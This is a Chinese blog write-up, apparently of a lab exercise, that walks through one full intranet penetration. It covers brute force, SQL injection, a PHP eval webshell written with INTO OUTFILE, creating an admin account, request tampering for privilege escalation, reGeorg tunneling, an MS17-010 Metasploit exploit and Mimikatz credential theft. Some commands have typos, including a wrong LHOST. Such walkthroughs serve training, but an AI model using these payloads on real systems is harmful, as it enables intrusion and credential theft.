zoukankan      html  css  js  c++  java
  • 一次完整内网渗透

    1暴力破解

    进入网站发现有登陆,开启代理,启动burp进行暴力破解

     

     成功破解获密码为admin23

     

     2sql注入

    在如下注释出发现sql注入

     

     使用sql map成功跑出网站后台账户与密码

     

     使用somd5破解密码为mysql123

     

     3获取shell

    访问域名192.168.31.196可得到探针,从中得到当前网站目录

     

     在使用获得的后台账号进入后,在数据维护中可执行sql语句,我们执行上传一句话语句select "<?php eval($_POST[‘pass’]);?>" into outfile "C:/UPUPW_AP5.2/htdocs/235.php"

     

     接着访问一下出现空白页面成功

     

     使用菜刀连接成功

     

     4远程连接

    先将一个大马上传

     

     在大马中利用命令创建一个超级管理员

     

     访问3386端口登陆自己创建的账号,成功连接

     

     5垂直越权创建后台超级管理员

    在修改密码添加管理员处,开启抓包

     

     将原先的submanage改为manage权限

     

    将包放掉后发现可以添加,进行添加并再次抓包进行提权

     

     将包放掉后,发现提示操作成功

     

     再用添加的账号进行登陆,成功添加为超级管理员

     6代理隧道

    kalireGeorg开启隧道

     

     kali使用工具 proxychains输入# vi /etc/proxychains.conf执行以上命令后,打开文件proxychains.conf文件中的dynamic_chain前面的注释符取消,添加代理服务器到列表(proxychains.conf文件末尾)socks5 127.0.0.1 9986.

     

     通过用户想要使用的应用程序运行ProxyChains启动firefox执行命令如下所示:root@kali:~# proxychains firefox

     

     成功访问内网ip

     

    7内网渗透

    通过大马执行命令arp-a发现内网的两台服务器ip为192.168.238.129和192.168.238.130

    用nmap -vvv -n -sT -PN [ip]命令扫描这两个ip

    代理msf,使msf可以使用

     

    利用ms17_010的漏洞

    设置好利用ms17_010所需要的参数
    use exploit/windows/smb/ms17_010_psexec #切换到ms17漏洞模块
    set RHOST 192.168.238.129 #设置目标机ip

    set LHOST 192.168.238.129 #设置本机ip

    exlioit #开始连接

    成功了msf5就会变成meterpreter,显然这里是成功了的

    利用脚本获取服务器用户及哈希(红框标注)

    哈希解密可得到密码为admin123

    另一个用猕猴桃得到明文密码

    • 使用命令开启目标主机的3389端口

     

    • 使用代理打开rdesktop,尝试连接内网目标主机

     

  • 相关阅读:
    2019年年终总结
    [转]网络基本功08-细说TCP滑动窗口
    anaconda启动报错-pythonw.exe
    FRP+WoL实现远程开机+远程桌面
    [转]网络基本功06-链路聚合
    我的效率工具分享
    比海飞丝更柔顺的写作体验
    阿里云加Picgo或MPic搭建最豪横的图床
    markdown从入门到放弃word和PDF
    Pocket+Evernote 打造个人知识库体系
  • 原文地址:https://www.cnblogs.com/xiaoerban/p/10968603.html
Copyright © 2011-2022 走看看